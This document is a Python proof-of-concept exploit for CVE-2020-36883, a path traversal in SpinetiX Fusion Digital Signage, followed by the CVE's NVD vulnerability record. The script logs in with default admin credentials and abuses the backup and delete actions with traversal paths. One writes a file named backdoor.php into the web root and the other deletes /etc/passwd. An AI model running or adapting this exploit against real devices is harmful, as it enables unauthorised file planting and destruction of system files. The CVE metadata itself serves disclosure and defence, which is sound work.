CVE-2020-36883

import requests import sys # CVE-2020-36883 PoC - Authenticated Path Traversal in SpinetiX Fusion # Target: SpinetiX Fusion Digital Signage <= 3.4.8 target = "http://target.com" username = "admin" password = "admin" session = requests.Session() # Step 1: Authentication login_url = f"{target}/index.php" login_data = { "username": username, "password": password } session.post(login_url, data=login_data) # Step 2: Path Traversal File Write (Backup Operation) backup_url = f"{target}/index.php" traversal_payload = "../../../var/www/html/backdoor.php" backup_data = { "action": "backup", "filename": traversal_payload } response = session.post(backup_url, data=backup_data) # Step 3: Path Traversal File Delete delete_url = f"{target}/index.php" delete_payload = "../../../etc/passwd" delete_data = { "action": "delete", "filepath": delete_payload } response = session.post(delete_url, data=delete_data) print(f"Exploit sent to {target}")

{"cve": {"id": "CVE-2020-36883", "sourceIdentifier": "[email protected]", "published": "2025-12-10T21:15:59.697", "lastModified": "2026-01-21T19:19:41.713", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "SpinetiX Fusion Digital Signage 3.4.8 and lower contains an authenticated path traversal vulnerability that allows attackers to manipulate file backup and deletion operations through unverified input parameters. Attackers can exploit path traversal techniques in index.php to write backup files to arbitrary locations and delete files by manipulating backup and file delete requests."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:spinetix:fusion_digital_signage:*:*:*:*:*:*:*:*", "versionEndIncluding": "3.4.8", "matchCriteriaId": "C299B96F-3700-44CD-A70B-905C1BFBEFCB"}]}]}], "references": [{"url": "https://github.com/Mbed-TLS/mbedtls", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "https://www.exploit-db.com/exploits/48844", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}, {"url": "https://www.spinetix.com", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/spinetix-fusion-digital-signage-authenticated-path-traversal-via-file-operations", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5594.php", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5594.php", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}